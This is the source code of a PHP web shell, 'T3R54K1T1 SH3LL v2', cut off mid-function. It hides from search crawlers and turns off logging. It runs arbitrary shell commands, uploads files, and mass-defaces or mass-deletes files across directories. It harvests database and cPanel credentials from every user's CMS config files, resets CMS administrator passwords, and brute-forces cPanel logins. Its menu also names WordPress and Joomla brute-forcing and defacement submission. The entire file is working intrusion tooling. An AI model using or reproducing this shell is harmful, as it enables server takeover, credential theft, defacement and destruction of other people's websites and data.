<?php
session_start();
error_reporting(0);
set_time_limit(0); @set_magic_quotes_runtime(0); @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0);
$auth_user =
"zukiciki";
$auth_pass = "01f378ae96f554e94ebed4b68e4e6b98"; // default: zukiciki
$color = "#00ff00";
$default_action = 'FilesMan'; $default_use_ajax = true;
$default_charset = 'UTF-8';
if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } function login_shell() { ?>
<html>
<head>
<title>forbidden</title>
<style type="text/css">
html
{
margin: 0px auto;
color: blue;
text-align: center;
}
header {
color: blue; margin:
0px auto;
}
input[type=text]
{
width: 250px;
height: 25px;
font-size: 15px;
color: red;
background: grey;
border: 2px inset red;
text-align: center;
margin: 5px;
}
input[type=password]
{
width: 250px;
height: 25px;
color: red;
font-size: 15px;
background: grey;
border: 2px inset red;
padding: 5px;
margin: 5px;
text-align: center;
}
</style>
</head>
<body bgcolor="black">
<center>
<header>
<pre>
<img src="http://i.imgur.com/B8Z36Bm.png"width="250"height="250">
</pre>
</header>
<form method="post">
username
:
<br>
<input type="text"name="user"vallue="username">
<br>
password
:
<br>
<input type="password" name="pass">
<br>
<br>
<input type="submit"name="hajar bang"value="hajar">
</form>
</body>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
login_shell(); if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download'))
{ @ob_clean(); $file = $_GET['file'];
header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0');
header('Cache-Control: must-revalidate'); header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit; }
?>
<html>
<head>
<title>t3r54k1t1 5h3ll v2</title>
<meta name='author' content='mr Z'>
<meta charset="UTF-8">
<style type='text/css'>
@font-face {
font-family: 'Comic Sans MS';
font-style: normal;
font-weight: 400;
src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
}
html {
background: #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
font-size: 13px;
width: 100%;
}
ul {
border: 1px solid blue;
background: green;
margin: 0px;
padding:15px;
}
li {
background: blue;
color: green;
display: inline;
border: 1px green;
margin: 5px;
border-radius: 10px;
padding: 3px;
}
table, th, td {
border-collapse:collapse;
background: transparent;
font-family: Comic Sans MS ;
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid green;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: #ffffff;
border: 1px solid #ffffff;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<H1><center><font color="bluesky">=>T3R54K1T1 SH3LL v2<=</font></center></h1>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=lime>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
error_reporting(0);
error_log(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($_GET['dir']);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "<center>";
echo "System: <font color=lime>".php_uname()."</font><br>";
echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font><br>";
echo "Safe Mode: $sm<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
if($_POST['upload']) {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=red>failed to upload file</font>";
}
}
echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
echo $act;
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo "</center>";
echo "<hr>";
echo "<center>";
echo "<ul>";
echo "<li><a href='?'>Home</a></li>";
echo "<li><a href='?dir=$dir&do=cmd'>Command</a></li>";
echo "<li><a href='?dir=$dir&do=mass_deface'>Mass Deface</a></li>";
echo "<li><a href='?dir=$dir&do=mass_delete'> Mass Delete </a></li>";
echo "<li><a href='?dir=$dir&do=config'>Config</a></li>";
echo "<li><a href='?dir=$dir&do=jumping'>Jumping</a></li>";
echo "<li><a href='?dir=$dir&do=sym'>symlink</a></li>";
echo "<li><a href='?dir=$dir&do=cpanel'>CPanel Crack</a></li>";
echo "<li><a href='?dir=$dir&do=elfinder'>exploit elfinder</a></li>";
echo "<li><a href='?dir=$dir&do=mirorsubmit'>auto submit mirror</a></li>";
echo "<br><br><br>";
echo "<li><a href='?dir=$dir&do=zoneh'>Zone-H</a></li>";
echo "<li><a href='?dir=$dir&do=network'>network</a></li>";
echo "<li><a href='?dir=$dir&do=wpbf'>wp bruteforce</a></li>";
echo "<li><a href='?dir=$dir&do=jbrute'>joomla bruteforce</a></li>";
echo "<li><a href='?dir=$dir&do=decode'>decode encode</a></li>";
echo "<li><a href='?dir=$dir&do=loko'>lokomedia auto upload</a></li>";
echo "<li><a href='?dir=$dir&do=whmcs'>email bruteforce</a></li>";
echo "<li><a href='?dir=$dir&do=finder'>mass symlink+cp and whm crack</a></li>";
echo "<li><a href='?dir=$dir&do=afinder'>admin finder</a></li>";
echo "<li><a href='?dir=$dir&do=adminer'>Adminer</a></li><br><br><br>";
echo "<li><a href='?dir=$dir&do=whois'>whois</a></li>";
echo "<li><a href='?dir=$dir&do=fake_root'>Fake Root</a></li>";
echo "<li><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></li>";
echo "<li><a href='?dir=$dir&do=bypass'>bypass</a></li>";
echo "<li><a href='?dir=$dir&do=wprespas'>wp respass</a></li>";
echo "<li><a href='?dir=$dir&do=vbindex'>vb index</a></li>";
echo "<li><a href='?dir=$dir&do=whm'>whmcs decoder</a></li>";
echo "<li><a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a></li>";
echo "<li><a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a></li>";
echo "</ul>";
echo "</center>";
echo "<hr>";
if($_GET['do'] == 'cmd') {
echo "<form method='post'>
<font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
</form>";
if($_POST['do_cmd']) {
echo "<pre>".exe($_POST['cmd'])."</pre>";
}
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=lime>DONE</font>] $lokasi<br>";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=lime>DONE</font>] $lokasi<br>";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.htm' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>Hacked by mr Z</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center>";
}
} elseif($_GET['do'] == 'mass_delete') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo "[<font color=lime>DELETED</font>] $lokasi<br>";
unlink($lokasi);
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
</form></center>";
}
} elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r");
$idx = mkdir("ctt_config", 0777);
$isi_htc = "Options all\nRequire None\nSatisfy Any";
$htc = fopen("ctt_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_ctt) {
$user_config_dir = "/home/$user_ctt/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_ctt/.my.cnf" => "cpanel",
"/home/$user_ctt/.accesshash" => "WHM-accesshash",
"/home/$user_ctt/public_html/vdo_config.php" => "Voodoo",
"/home/$user_ctt/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$user_ctt/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_ctt/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$user_ctt/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$user_ctt/public_html/whm/configuration.php" => "WHMCS",
"/home/$user_ctt/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$user_ctt/public_html/forum/config.php" => "phpBB",
"/home/$user_ctt/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_ctt/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_ctt/public_html/app/etc/local.xml" => "Magento",
"/home/$user_ctt/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_ctt/public_html/configuration.php" => "Joomla",
"/home/$user_ctt/public_html/wp/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/admin/config.php" => "OpenCart",
"/home/$user_ctt/public_html/slconfig.php" => "Sitelok",
"/home/$user_ctt/public_html/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("ctt_config/$user_ctt-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$dir/ctt_config'><font color=lime>Done</font></a></center>";
} elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "<pre><div class='margin: 5px auto;'>";
$etc = fopen("/etc/passwd", "r");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_ctt_jump) {
$user_jumping_dir = "/home/$user_ctt_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
if(is_writable($user_jumping_dir)) {
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_ctt_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
}
echo "</div></pre>";
} elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "username atau password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Joomla<br>";
if($site == '') {
echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "Sitename => $site<br>";
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Wordpress<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Magento<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => OpenCart<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
if($target2 == '') {
$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
} else {
$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Lokomedia<br>";
if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User & Pass: <br>
<input type='text' name='user_baru' value='ctt123' placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='ctt123' placeholder='pass_baru'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
} elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
} else {
$i++;
if(function_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
$dom = "<font color=red>gabisa ambil nama domain nya</font>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
break;
}
}
}
} else {
$dom = "<font color=red>function is Disable by system</font>";
}
echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>mr Z</font>";
}
} else {
echo "<center>
<form method='post'>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public_html")) {
echo "$user_cp\n";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")."\n";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
